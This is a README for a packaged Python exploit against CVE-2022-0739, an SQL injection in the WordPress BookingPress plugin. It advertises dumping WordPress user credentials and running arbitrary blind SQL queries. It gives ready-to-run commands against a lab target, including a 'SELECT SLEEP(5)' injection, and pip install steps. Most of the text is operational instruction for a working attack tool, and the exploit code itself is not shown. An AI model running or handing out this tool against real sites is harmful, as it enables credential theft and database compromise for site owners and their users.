Share
## https://sploitus.com/exploit?id=D1FB78D4-8282-50A6-B077-E4D99104B2EE
# CVE-2022-0739
Python PoC Exploit for [CVE-2022-0739](https://nvd.nist.gov/vuln/detail/CVE-2022-0739)
## Features
* Database Metadata Lookup
* Wordpress User Credential Dump
* Arbitrary Blind Query Injection ๐
## Usage
```bash
usage: cve-2022-0739 [-h] -u URL [-e EXEC]
options:
-h, --help show this help message and exit
-u URL, --url URL URL of the page containing the BookingPress Widget
-e EXEC, --exec EXEC Optional query for Blind SQL Injection
```
### Information Leak
```bash
cve-2022-0739 --url http://metapress.htb/event
```
### Blind Injection
```bash
cve-2022-0739 --url http://metapress.htb/event --exec "SELECT SLEEP(5)"
```
## Installation
### PyPI
```bash
python3 -m pip install cve-2022-0739
```
### Manual
```bash
python3 -m pip install cve_2022_0739-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-0739/releases/download/1.0.0/cve_2022_0739-1.0.0-py3-none-any.whl)
## Demo
### Information Leak
[](https://asciinema.org/a/544403?autoplay=1)
### Blind Injection
[](https://asciinema.org/a/544404?autoplay=1)